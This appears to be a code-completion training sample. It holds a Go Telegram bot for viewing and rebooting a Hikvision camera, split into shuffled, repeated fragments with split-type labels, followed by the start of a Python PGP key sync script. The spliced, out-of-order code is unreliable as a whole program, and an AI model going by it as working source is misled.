b.Send(admin, "Bot restart!")
b.Start()
}
func Login() int {
// user = C.HLogin(C.CString(*ipParam), C.CString(*userParam), C.CString(*passParam), &dev)
user, dev = hiklib.HikLogin(*ipParam, *userParam, *passParam)
if int(user) > -1 {
if *x1Param {
hiklib.HikOnAlarmV30(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
} else {
hiklib.HikOnAlarm(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
}
return int(user)
} else {
return int(user)
}
}
func main() {
log.Println("HIKBOT v0.0.4")
flag.Parse()
if *ipParam == "" || *userParam == "" || *passParam == "" || *adminParam == 0 || *tkeyParam == "" {
flag.PrintDefaults()
} else {
motions = make(chan hiklib.AlarmItem, 100)
log.Printf("%s\n", hiklib.HikVersion())
if Login() > -1 {
defer hiklib.HikLogout(user)
bot()
} else {
log.Println("Error login.")
}
}
}
| Recipient | identifier_name |
main.go | package main
import (
"encoding/json"
"flag"
"fmt"
"image"
"image/color"
"image/draw"
"image/jpeg"
"log"
"math"
"os"
"path/filepath"
"strconv"
"strings"
"time"
"github.com/google/uuid"
"github.com/sarjsheff/hiklib"
ffmpeg "github.com/u2takey/ffmpeg-go"
tb "gopkg.in/tucnak/telebot.v2"
)
var ipParam = flag.String("c", "", "Camera IP address.")
var userParam = flag.String("u", "", "Username.")
var passParam = flag.String("p", "", "Password.")
var tkeyParam = flag.String("t", "", "Telegram key.")
var adminParam = flag.Int("a", 0, "Telegram userid.")
var alarmParam = flag.Int("b", 7200, "Alarm port.")
var datadirParam = flag.String("d", "/tmp", "Data dir, default: /tmp .")
var previewsizeParam = flag.Int("s", 20000000, "Video preview byte size.")
var zParam = flag.Int("z", 2, "Video preview rescale (divide).")
var x1Param = flag.Bool("x1", false, "Issue 1.")
// type AlarmItem struct {
// IP string
// Command int
// AlarmType int
// }
type FFProbe struct {
Streams []map[string]interface{} `json:"streams"`
Format map[string]interface{} `json:"format"`
}
var appid uuid.UUID = uuid.Must(uuid.NewRandom())
var motions chan hiklib.AlarmItem
// var dev = C.DevInfo{byStartChan: 0}
// var user = C.int(-1)
var dev = hiklib.DevInfo{ByStartChan: 0}
var user = -1
type touser string
type MotionArea struct{ x, y, w, h float32 }
func (t touser) Recipient() string {
return string(t)
}
// //export onmessagev30
// func onmessagev30(command C.int, pAlarmer *C.NET_DVR_ALARMER, pAlarmInfo *C.char, dwBufLen C.uint, pUserData unsafe.Pointer) {
// i := AlarmItem{IP: C.GoString(&pAlarmer.sDeviceIP[0]), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// log.Println("ALARM")
// i.AlarmType = int(C.getalarminfo(pAlarmInfo).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED")
// break
// default:
// log.Printf("Unknown Alarm [0x%x] !!!", command)
// }
// }
// //export onmessage
// func onmessage(command C.int, ip *C.char, data *C.char, ln C.uint) C.int {
// i := AlarmItem{IP: C.GoString(ip), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// i.AlarmType = int(C.getalarminfo(data).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED %s %s", C.GoString(ip), C.GoString(data))
// break
// default:
// log.Printf("Unknown Alarm [0x%x] %s %s !!!", command, C.GoString(ip), C.GoString(data))
// }
// return 1
// }
func bot() {
videolist := map[string]string{}
done := make(chan int, 1)
done <- 1
admin := touser(strconv.Itoa(*adminParam))
b, err := tb.NewBot(tb.Settings{
Token: *tkeyParam,
Poller: &tb.LongPoller{Timeout: 10 * time.Second},
})
if err != nil {
log.Fatal(err)
return
}
// var menu = &tb.ReplyMarkup{ResizeReplyKeyboard: true}
// var btnSettings = menu.Data("⚙", "Settings")
video := func(offset int, limit int) {
//var v = hiklib.MotionVideos{} //C.MotionVideos{}
mm, _ := b.Send(admin, "Fetch video from camera...")
//C.HListVideo(C.int(user), &v)
_, v := hiklib.HikListVideo(user)
b.Edit(mm, strconv.Itoa(v.Count)+" video on camera.")
if v.Count > 0 {
txt := ""
if offset == 0 {
txt = fmt.Sprintf("First %d video:\n", limit)
} else {
txt = fmt.Sprintf("%d video from %d :\n", limit, offset)
}
for i := offset - 1; i < v.Count && i < offset+limit-1; i++ {
dt := time.Date(v.Videos[i].From_year, time.Month(v.Videos[i].From_month), v.Videos[i].From_day, v.Videos[i].From_hour, v.Videos[i].From_min, v.Videos[i].From_sec, 0, time.UTC)
todt := time.Date(v.Videos[i].To_year, time.Month(v.Videos[i].To_month), v.Videos[i].To_day, v.Videos[i].To_hour, v.Videos[i].To_min, v.Videos[i].To_sec, 0, time.UTC)
txt = txt + "<b>" + dt.Format("2006-01-02 15:04:05") + " - " + todt.Format("15:04:05") + "</b> /dl_" + v.Videos[i].Filename + " \n"
videolist[v.Videos[i].Filename] = dt.Format("2006-01-02/15:04:05")
}
if offset+limit < v.Count {
txt = txt + fmt.Sprintf("<b>Next 10 video /video_%d_%d</b>\n", offset+limit, limit)
}
// menu.Inline(menu.Row(btnSettings))
// b.Send(admin, txt, &tb.SendOptions{ReplyMarkup: menu, ParseMode: tb.ModeHTML})
_, err = b.Send(admin, txt, &tb.SendOptions{ParseMode: tb.ModeHTML})
if err != nil {
log.Println(err)
}
}
}
snapshot := func(mareas bool) {
fname := filepath.Join(*datadirParam, fmt.Sprintf("%s.jpeg", uuid.Must(uuid.NewRandom()).String()))
err := hiklib.HikCaptureImage(user, dev.ByStartChan, fname)
if err > -1 {
caption := ""
if mareas {
// var ma = C.MotionAreas{}
// C.HMotionArea(C.int(user), &ma)
_, ma := hiklib.HikMotionArea(user)
col := color.RGBA{255, 0, 0, 128}
var dst *image.RGBA
var b image.Rectangle
f, err := os.Open(fname)
if err == nil {
defer f.Close()
img, _, err := image.Decode(f)
if err == nil {
b = img.Bounds()
dst = image.NewRGBA(image.Rect(0, 0, b.Dx(), b.Dy()))
draw.Draw(dst, b, img, b.Min, draw.Src)
}
}
caption = caption + fmt.Sprintf("Image size %vx%v\n", b.Dx(), b.Dy())
for i := 0; i < 8; i++ {
if ma.Areas[i].W > 0 && ma.Areas[i].H > 0 {
x, y, w, h := int(float32(b.Dx())*float32(ma.Areas[i].X)), int(float32(b.Dy())*float32(ma.Areas[i].Y)), int(float32(b.Dx())*float32(ma.Areas[i].W)), int(float32(b.Dy())*float32(ma.Areas[i].H))
log.Printf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
caption = caption + fmt.Sprintf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
if dst != nil {
Rect(dst, x, y, w, h, col)
}
}
}
if dst != nil {
f.Close()
f, err = os.Create(fname)
if err == nil {
defer f.Close()
opt := jpeg.Options{
Quality: 100,
}
err = jpeg.Encode(f, dst, &opt)
}
}
}
//p := &tb.Photo{File: tb.FromDisk(fname)}
//b.SendAlbum(admin, tb.Album{p})
p := &tb.Document{File: tb.FromDisk(fname), MIME: "image/jpeg", FileName: time.Now().Format(time.RFC3339) + ".jpeg"}
if caption != "" {
p.Caption = caption
}
b.Send(admin, p)
os.Remove(fname)
} else {
b.Send(admin, fmt.Sprintf("Error get snapshot [%d].", err))
}
}
// On inline button pressed (callback)
// b.Handle(&btnSettings, func(c *tb.Callback) {
// b.Respond(c, &tb.CallbackResponse{Text: "testttt"})
// })
b.Handle("/video", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
video(1, 10)
}
done <- 1
})
b.Handle("/mareas", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(true)
}
done <- 1
})
b.Handle("/snap", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(false)
}
done <- 1
})
b.Handle("/reboot", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
res := hiklib.HikReboot(user)
if res > 0 {
b.Send(m.Sender, "Rebooting! Wait 10 sec.")
time.Sleep(10 * time.Second)
for Login() < 1 {
b.Send(m.Sender, "Wait 3 sec.")
time.Sleep(3 * time.Second)
}
b.Send(m.Sender, "Camera online.")
} else {
b.Send(m.Sender, fmt.Sprintf("Fail [%d].", res))
}
}
done <- 1
})
b.Handle(tb.OnText, func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
if strings.HasPrefix(m.Text, "/dl_") {
mm, _ := b.Send(admin, "Loading...")
log.Println(m.Text[4:]) |
if _, err := os.Stat(fname); os.IsNotExist(err) {
opts := ffmpeg.KwArgs{
"format": "mp4",
//"fs": strconv.Itoa(*previewsizeParam),
"vcodec": "copy", //"libx264",
"preset": "ultrafast",
"acodec": "none",
"movflags": "+faststart",
}
// C.HSaveFile(C.int(user), C.CString(m.Text[4:]), C.CString(fname))
hiklib.HikSaveFile(user, m.Text[4:], fname)
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
// b.Send(admin, f)
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
if sz, err := strconv.Atoi(fjson.Format["size"].(string)); err == nil {
if sz > *previewsizeParam {
if s, err := strconv.ParseFloat(fjson.Format["duration"].(string), 64); err == nil {
opts["vcodec"] = "libx264"
opts["b"] = strconv.Itoa(int(math.Floor(float64(*previewsizeParam)/math.Floor(s)) * 8))
p.Width = int(math.Round(float64(p.Width) / float64(*zParam)))
p.Height = int(math.Round(float64(p.Height) / float64(*zParam)))
opts["vf"] = fmt.Sprintf("scale=%d:%d", p.Width, p.Height)
//opts["vf"] = "scale=iw/2:ih/2"
log.Println("Change bitrate", opts["b"])
}
}
}
} else {
log.Println(err)
}
b.Edit(mm, "Transcoding ...")
err = ffmpeg.Input(fname).
Output(fname+".mp4", opts).OverWriteOutput().
Run()
if err != nil {
log.Println(err)
}
} else {
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
} else {
log.Println(err)
}
}
b.Edit(mm, "Sending...")
p.File = tb.FromDisk(fname + ".mp4")
p.FileName = "video.mp4"
b.Send(admin, p)
b.Delete(mm)
if *datadirParam == "/tmp" {
os.Remove(fname)
os.Remove(fname + ".mp4")
}
} else {
b.Send(admin, "Not found.")
}
} else if strings.HasPrefix(m.Text, "/video_") {
args := strings.Split(m.Text[7:], "_")
if len(args) > 1 {
offset, err := strconv.Atoi(args[0])
if err == nil {
limit, err := strconv.Atoi(args[1])
if err == nil && offset > -1 && limit > 0 {
video(offset, limit)
}
}
}
}
}
done <- 1
})
go func() {
for {
i := <-motions
if i.AlarmType == 3 {
snapshot(false)
} else {
log.Println(i)
}
}
}()
b.Send(admin, "Bot restart!")
b.Start()
}
func Login() int {
// user = C.HLogin(C.CString(*ipParam), C.CString(*userParam), C.CString(*passParam), &dev)
user, dev = hiklib.HikLogin(*ipParam, *userParam, *passParam)
if int(user) > -1 {
if *x1Param {
hiklib.HikOnAlarmV30(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
} else {
hiklib.HikOnAlarm(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
}
return int(user)
} else {
return int(user)
}
}
func main() {
log.Println("HIKBOT v0.0.4")
flag.Parse()
if *ipParam == "" || *userParam == "" || *passParam == "" || *adminParam == 0 || *tkeyParam == "" {
flag.PrintDefaults()
} else {
motions = make(chan hiklib.AlarmItem, 100)
log.Printf("%s\n", hiklib.HikVersion())
if Login() > -1 {
defer hiklib.HikLogout(user)
bot()
} else {
log.Println("Error login.")
}
}
} |
if filename, ok := videolist[m.Text[4:]]; ok {
os.MkdirAll(filepath.Join(*datadirParam, strings.Split(filename, "/")[0]), 0755)
fname := filepath.Join(*datadirParam, filename+".mpeg")
p := &tb.Video{} | random_line_split |
main.go | package main
import (
"encoding/json"
"flag"
"fmt"
"image"
"image/color"
"image/draw"
"image/jpeg"
"log"
"math"
"os"
"path/filepath"
"strconv"
"strings"
"time"
"github.com/google/uuid"
"github.com/sarjsheff/hiklib"
ffmpeg "github.com/u2takey/ffmpeg-go"
tb "gopkg.in/tucnak/telebot.v2"
)
var ipParam = flag.String("c", "", "Camera IP address.")
var userParam = flag.String("u", "", "Username.")
var passParam = flag.String("p", "", "Password.")
var tkeyParam = flag.String("t", "", "Telegram key.")
var adminParam = flag.Int("a", 0, "Telegram userid.")
var alarmParam = flag.Int("b", 7200, "Alarm port.")
var datadirParam = flag.String("d", "/tmp", "Data dir, default: /tmp .")
var previewsizeParam = flag.Int("s", 20000000, "Video preview byte size.")
var zParam = flag.Int("z", 2, "Video preview rescale (divide).")
var x1Param = flag.Bool("x1", false, "Issue 1.")
// type AlarmItem struct {
// IP string
// Command int
// AlarmType int
// }
type FFProbe struct {
Streams []map[string]interface{} `json:"streams"`
Format map[string]interface{} `json:"format"`
}
var appid uuid.UUID = uuid.Must(uuid.NewRandom())
var motions chan hiklib.AlarmItem
// var dev = C.DevInfo{byStartChan: 0}
// var user = C.int(-1)
var dev = hiklib.DevInfo{ByStartChan: 0}
var user = -1
type touser string
type MotionArea struct{ x, y, w, h float32 }
func (t touser) Recipient() string {
return string(t)
}
// //export onmessagev30
// func onmessagev30(command C.int, pAlarmer *C.NET_DVR_ALARMER, pAlarmInfo *C.char, dwBufLen C.uint, pUserData unsafe.Pointer) {
// i := AlarmItem{IP: C.GoString(&pAlarmer.sDeviceIP[0]), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// log.Println("ALARM")
// i.AlarmType = int(C.getalarminfo(pAlarmInfo).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED")
// break
// default:
// log.Printf("Unknown Alarm [0x%x] !!!", command)
// }
// }
// //export onmessage
// func onmessage(command C.int, ip *C.char, data *C.char, ln C.uint) C.int {
// i := AlarmItem{IP: C.GoString(ip), Command: int(command)}
// switch int(command) {
// case COMM_ALARM_V30:
// i.AlarmType = int(C.getalarminfo(data).dwAlarmType)
// motions <- i
// break
// case COMM_DEV_STATUS_CHANGED:
// log.Printf("COMM_DEV_STATUS_CHANGED %s %s", C.GoString(ip), C.GoString(data))
// break
// default:
// log.Printf("Unknown Alarm [0x%x] %s %s !!!", command, C.GoString(ip), C.GoString(data))
// }
// return 1
// }
func bot() {
videolist := map[string]string{}
done := make(chan int, 1)
done <- 1
admin := touser(strconv.Itoa(*adminParam))
b, err := tb.NewBot(tb.Settings{
Token: *tkeyParam,
Poller: &tb.LongPoller{Timeout: 10 * time.Second},
})
if err != nil {
log.Fatal(err)
return
}
// var menu = &tb.ReplyMarkup{ResizeReplyKeyboard: true}
// var btnSettings = menu.Data("⚙", "Settings")
video := func(offset int, limit int) {
//var v = hiklib.MotionVideos{} //C.MotionVideos{}
mm, _ := b.Send(admin, "Fetch video from camera...")
//C.HListVideo(C.int(user), &v)
_, v := hiklib.HikListVideo(user)
b.Edit(mm, strconv.Itoa(v.Count)+" video on camera.")
if v.Count > 0 {
txt := ""
if offset == 0 {
txt = fmt.Sprintf("First %d video:\n", limit)
} else {
txt = fmt.Sprintf("%d video from %d :\n", limit, offset)
}
for i := offset - 1; i < v.Count && i < offset+limit-1; i++ {
dt := time.Date(v.Videos[i].From_year, time.Month(v.Videos[i].From_month), v.Videos[i].From_day, v.Videos[i].From_hour, v.Videos[i].From_min, v.Videos[i].From_sec, 0, time.UTC)
todt := time.Date(v.Videos[i].To_year, time.Month(v.Videos[i].To_month), v.Videos[i].To_day, v.Videos[i].To_hour, v.Videos[i].To_min, v.Videos[i].To_sec, 0, time.UTC)
txt = txt + "<b>" + dt.Format("2006-01-02 15:04:05") + " - " + todt.Format("15:04:05") + "</b> /dl_" + v.Videos[i].Filename + " \n"
videolist[v.Videos[i].Filename] = dt.Format("2006-01-02/15:04:05")
}
if offset+limit < v.Count {
txt = txt + fmt.Sprintf("<b>Next 10 video /video_%d_%d</b>\n", offset+limit, limit)
}
// menu.Inline(menu.Row(btnSettings))
// b.Send(admin, txt, &tb.SendOptions{ReplyMarkup: menu, ParseMode: tb.ModeHTML})
_, err = b.Send(admin, txt, &tb.SendOptions{ParseMode: tb.ModeHTML})
if err != nil {
log.Println(err)
}
}
}
snapshot := func(mareas bool) {
fname := filepath.Join(*datadirParam, fmt.Sprintf("%s.jpeg", uuid.Must(uuid.NewRandom()).String()))
err := hiklib.HikCaptureImage(user, dev.ByStartChan, fname)
if err > -1 {
caption := ""
if mareas {
// var ma = C.MotionAreas{}
// C.HMotionArea(C.int(user), &ma)
_, ma := hiklib.HikMotionArea(user)
col := color.RGBA{255, 0, 0, 128}
var dst *image.RGBA
var b image.Rectangle
f, err := os.Open(fname)
if err == nil {
defer f.Close()
img, _, err := image.Decode(f)
if err == nil {
b = img.Bounds()
dst = image.NewRGBA(image.Rect(0, 0, b.Dx(), b.Dy()))
draw.Draw(dst, b, img, b.Min, draw.Src)
}
}
caption = caption + fmt.Sprintf("Image size %vx%v\n", b.Dx(), b.Dy())
for i := 0; i < 8; i++ {
if ma.Areas[i].W > 0 && ma.Areas[i].H > 0 {
x, y, w, h := int(float32(b.Dx())*float32(ma.Areas[i].X)), int(float32(b.Dy())*float32(ma.Areas[i].Y)), int(float32(b.Dx())*float32(ma.Areas[i].W)), int(float32(b.Dy())*float32(ma.Areas[i].H))
log.Printf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
caption = caption + fmt.Sprintf("Area %v x:%v y:%v [%vx%v]\n", i+1, x, y, w, h)
if dst != nil {
Rect(dst, x, y, w, h, col)
}
}
}
if dst != nil {
f.Close()
f, err = os.Create(fname)
if err == nil {
defer f.Close()
opt := jpeg.Options{
Quality: 100,
}
err = jpeg.Encode(f, dst, &opt)
}
}
}
//p := &tb.Photo{File: tb.FromDisk(fname)}
//b.SendAlbum(admin, tb.Album{p})
p := &tb.Document{File: tb.FromDisk(fname), MIME: "image/jpeg", FileName: time.Now().Format(time.RFC3339) + ".jpeg"}
if caption != "" {
p.Caption = caption
}
b.Send(admin, p)
os.Remove(fname)
} else {
b.Send(admin, fmt.Sprintf("Error get snapshot [%d].", err))
}
}
// On inline button pressed (callback)
// b.Handle(&btnSettings, func(c *tb.Callback) {
// b.Respond(c, &tb.CallbackResponse{Text: "testttt"})
// })
b.Handle("/video", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
video(1, 10)
}
done <- 1
})
b.Handle("/mareas", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(true)
}
done <- 1
})
b.Handle("/snap", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
snapshot(false)
}
done <- 1
})
b.Handle("/reboot", func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
res := hiklib.HikReboot(user)
if res > 0 {
b.Send(m.Sender, "Rebooting! Wait 10 sec.")
time.Sleep(10 * time.Second)
for Login() < 1 {
b.Send(m.Sender, "Wait 3 sec.")
time.Sleep(3 * time.Second)
}
b.Send(m.Sender, "Camera online.")
} else {
b.Send(m.Sender, fmt.Sprintf("Fail [%d].", res))
}
}
done <- 1
})
b.Handle(tb.OnText, func(m *tb.Message) {
<-done
if m.Sender.ID == *adminParam {
if strings.HasPrefix(m.Text, "/dl_") {
mm, _ := b.Send(admin, "Loading...")
log.Println(m.Text[4:])
if filename, ok := videolist[m.Text[4:]]; ok {
os.MkdirAll(filepath.Join(*datadirParam, strings.Split(filename, "/")[0]), 0755)
fname := filepath.Join(*datadirParam, filename+".mpeg")
p := &tb.Video{}
if _, err := os.Stat(fname); os.IsNotExist(err) {
opts := ffmpeg.KwArgs{
"format": "mp4",
//"fs": strconv.Itoa(*previewsizeParam),
"vcodec": "copy", //"libx264",
"preset": "ultrafast",
"acodec": "none",
"movflags": "+faststart",
}
// C.HSaveFile(C.int(user), C.CString(m.Text[4:]), C.CString(fname))
hiklib.HikSaveFile(user, m.Text[4:], fname)
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
// b.Send(admin, f)
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
if sz, err := strconv.Atoi(fjson.Format["size"].(string)); err == nil {
if sz > *previewsizeParam {
if s, err := strconv.ParseFloat(fjson.Format["duration"].(string), 64); err == nil {
opts["vcodec"] = "libx264"
opts["b"] = strconv.Itoa(int(math.Floor(float64(*previewsizeParam)/math.Floor(s)) * 8))
p.Width = int(math.Round(float64(p.Width) / float64(*zParam)))
p.Height = int(math.Round(float64(p.Height) / float64(*zParam)))
opts["vf"] = fmt.Sprintf("scale=%d:%d", p.Width, p.Height)
//opts["vf"] = "scale=iw/2:ih/2"
log.Println("Change bitrate", opts["b"])
}
}
}
} else {
log.Println(err)
}
b.Edit(mm, "Transcoding ...")
err = ffmpeg.Input(fname).
Output(fname+".mp4", opts).OverWriteOutput().
Run()
if err != nil {
log.Println(err)
}
} else {
b.Edit(mm, "Probing...")
f, err := ffmpeg.Probe(fname)
var fjson FFProbe
err = json.Unmarshal([]byte(f), &fjson)
if err == nil {
p.Width = int(fjson.Streams[0]["width"].(float64))
p.Height = int(fjson.Streams[0]["height"].(float64))
} else {
log.Println(err)
}
}
b.Edit(mm, "Sending...")
p.File = tb.FromDisk(fname + ".mp4")
p.FileName = "video.mp4"
b.Send(admin, p)
b.Delete(mm)
if *datadirParam == "/tmp" {
os.Remove(fname)
os.Remove(fname + ".mp4")
}
} else {
b.Send(admin, "Not found.")
}
} else if strings.HasPrefix(m.Text, "/video_") {
args := strings.Split(m.Text[7:], "_")
if len(args) > 1 {
offset, err := strconv.Atoi(args[0])
if err == nil {
limit, err := strconv.Atoi(args[1])
if err == nil && offset > -1 && limit > 0 {
video(offset, limit)
}
}
}
}
}
done <- 1
})
go func() {
for {
i := <-motions
if i.AlarmType == 3 {
snapshot(false)
} else {
log.Println(i)
}
}
}()
b.Send(admin, "Bot restart!")
b.Start()
}
func Login() int {
| func main() {
log.Println("HIKBOT v0.0.4")
flag.Parse()
if *ipParam == "" || *userParam == "" || *passParam == "" || *adminParam == 0 || *tkeyParam == "" {
flag.PrintDefaults()
} else {
motions = make(chan hiklib.AlarmItem, 100)
log.Printf("%s\n", hiklib.HikVersion())
if Login() > -1 {
defer hiklib.HikLogout(user)
bot()
} else {
log.Println("Error login.")
}
}
}
| // user = C.HLogin(C.CString(*ipParam), C.CString(*userParam), C.CString(*passParam), &dev)
user, dev = hiklib.HikLogin(*ipParam, *userParam, *passParam)
if int(user) > -1 {
if *x1Param {
hiklib.HikOnAlarmV30(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
} else {
hiklib.HikOnAlarm(user, *alarmParam, func(item hiklib.AlarmItem) {
motions <- item
})
}
return int(user)
} else {
return int(user)
}
}
| identifier_body |
sync_keys.py | #!/usr/bin/env python3
# -*- coding:UTF-8 -*-
# Copyright (c) 2022 Nicolas Iooss
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Sync some PGP keys used in widely-used projects
This uses Web Key Directory (WKD) described on:
- https://wiki.gnupg.org/WKD
- https://datatracker.ietf.org/doc/draft-koch-openpgp-webkey-service/
For information, to use WKD in the command-line:
gpg --auto-key-locate nodefault,wkd --locate-keys user@example.org
"""
import base64
import hashlib
from pathlib import Path
import re
import subprocess
import sys
import time
import tempfile
from typing import Union
import urllib.error
import urllib.parse
import urllib.request
KEYS_PATH = Path(__file__).parent / "keys.txt"
ALL_KEYS_PATH = Path(__file__).parent / "all_keys"
ZBASE32_ALPHABET = "ybndrfg8ejkmcpqxot1uwisza345h769"
ZBASE32_ALPHABET_REV = {c: i for i, c in enumerate(ZBASE32_ALPHABET)}
def opgp_crc24(data: bytes) -> int:
"""Computes the CRC24 used by OpenPGP Message Format
Specification: https://www.rfc-editor.org/rfc/rfc4880#section-6
#define CRC24_INIT 0xB704CE
#define CRC24_POLY 0x1864CFB
"""
crc = 0xB704CE
for byte in data:
crc ^= byte << 16
for _ in range(8):
crc <<= 1
if (crc & 0x1000000) != 0:
crc ^= 0x1864CFB
assert 0 <= crc <= 0xFFFFFF
return crc
def opgp_crc24_b64(data: bytes) -> str:
"""Computes the CRC24 used by OpenPGP Message Format, encoded in base64"""
crc = opgp_crc24(data)
return "=" + base64.b64encode(crc.to_bytes(3, "big")).decode("ascii")
def unarmor_gpg(armored: Union[bytes, str]) -> bytes:
if isinstance(armored, str):
lines = armored.splitlines()
else:
lines = armored.decode("ascii").splitlines()
if lines[0] != "-----BEGIN PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected first line {lines[0]!r}")
if lines[-1] != "-----END PGP PUBLIC KEY BLOCK-----":
raise ValueError(f"unexpected last line {lines[0]!r}")
first_empty_line = lines.index("")
data = base64.b64decode("".join(lines[first_empty_line + 1:-2]))
computed_checksum = opgp_crc24_b64(data)
if lines[-2] != computed_checksum:
raise ValueError(f"unexpected checksum {lines[-2]!r}, expected {computed_checksum}")
return data
def zbase32_encode(data: bytes) -> str:
"""Encode some data using the z-base-32 encoding
This encoding is specified for ZRTP protocol in
https://www.rfc-editor.org/rfc/rfc6189.html#section-5.1.6
and used an alphabet described as:
This base32 encoding scheme differs from RFC 4648, and was designed
(by Bryce Wilcox-O'Hearn) to represent bit sequences in a form that
is convenient for human users to manipulate with minimal ambiguity.
The unusually permuted character ordering was designed for other
applications that use bit sequences that do not end on quintet
boundaries.
This hash is used by WKD and can be computed by GnuPG:
gpg --with-wkd-hash -k yourmail@example.org
"""
result = ""
for idx in range(0, len(data), 5):
result += ZBASE32_ALPHABET[(data[idx] & 0xF8) >> 3]
if idx + 1 == len(data):
result += ZBASE32_ALPHABET[(data[idx] & 0x07) << 2]
break
result += ZBASE32_ALPHABET[((data[idx] & 0x07) << 2) | ((data[idx + 1] & 0xC0) >> 6)]
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x3E) >> 1]
if idx + 2 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 1] & 0x01) << 4]
break
result += ZBASE32_ALPHABET[((data[idx + 1] & 0x01) << 4) | ((data[idx + 2] & 0xF0) >> 4)]
if idx + 3 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 2] & 0x0F) << 1]
break
result += ZBASE32_ALPHABET[((data[idx + 2] & 0x0F) << 1) | ((data[idx + 3] & 0x80) >> 7)]
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x7C) >> 2]
if idx + 4 == len(data):
result += ZBASE32_ALPHABET[(data[idx + 3] & 0x03) << 3]
break
result += ZBASE32_ALPHABET[((data[idx + 3] & 0x03) << 3) | ((data[idx + 4] & 0xE0) >> 5)]
result += ZBASE32_ALPHABET[data[idx + 4] & 0x1F]
assert len(result) == (len(data) * 8 + 4) // 5
return result
def zbase32_decode(text: str) -> bytes:
"""Decode some data using the z-base-32 encoding"""
result = bytearray(len(text) * 5 // 8)
cur_byte = 0
cur_numbits = 0
idx = 0
for character in text:
value = ZBASE32_ALPHABET_REV[character]
cur_byte = (cur_byte << 5) | value
cur_numbits += 5
if cur_numbits >= 8:
cur_numbits -= 8
result[idx] = cur_byte >> cur_numbits
idx += 1
cur_byte &= (1 << cur_numbits) - 1
return bytes(result)
def get_wkd_advanced_url(email: str) -> str:
"""Craft an URL for WKD advanced method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://openpgpkey.{domain}/.well-known/openpgpkey/{domain}/hu/{local_b32}?{params}"
def get_wkd_direct_url(email: str) -> str:
"""Craft an URL for WKD direct method"""
local, domain = email.split("@", 1)
domain = domain.lower()
local_sha1 = hashlib.sha1(local.lower().encode("ascii")).digest()
local_b32 = zbase32_encode(local_sha1)
params = urllib.parse.urlencode({"l": local})
return f"https://{domain}/.well-known/openpgpkey/hu/{local_b32}?{params}"
def self_check() -> None:
"""Verify that the algorithm computing WKD URLs work"""
assert len(ZBASE32_ALPHABET) == 32
# Test vector from https://github.com/matusf/z-base-32/blob/0.1.2/src/lib.rs
assert zbase32_encode(b"asdasd") == "cf3seamuco"
assert zbase32_decode("cf3seamuco") == b"asdasd"
# Test vector from https://www.uriports.com/blog/setting-up-openpgp-web-key-directory/
# assert zbase32_encode(hashlib.sha1(b"yourmail").digest()) == "hacabazoakmnagxwmkjerb9yehuwehbm"
# -> this hash is wrong, and I don't know what username gives the SHA1
# e61980e2f0c2962c19f45a928207e0472744702b
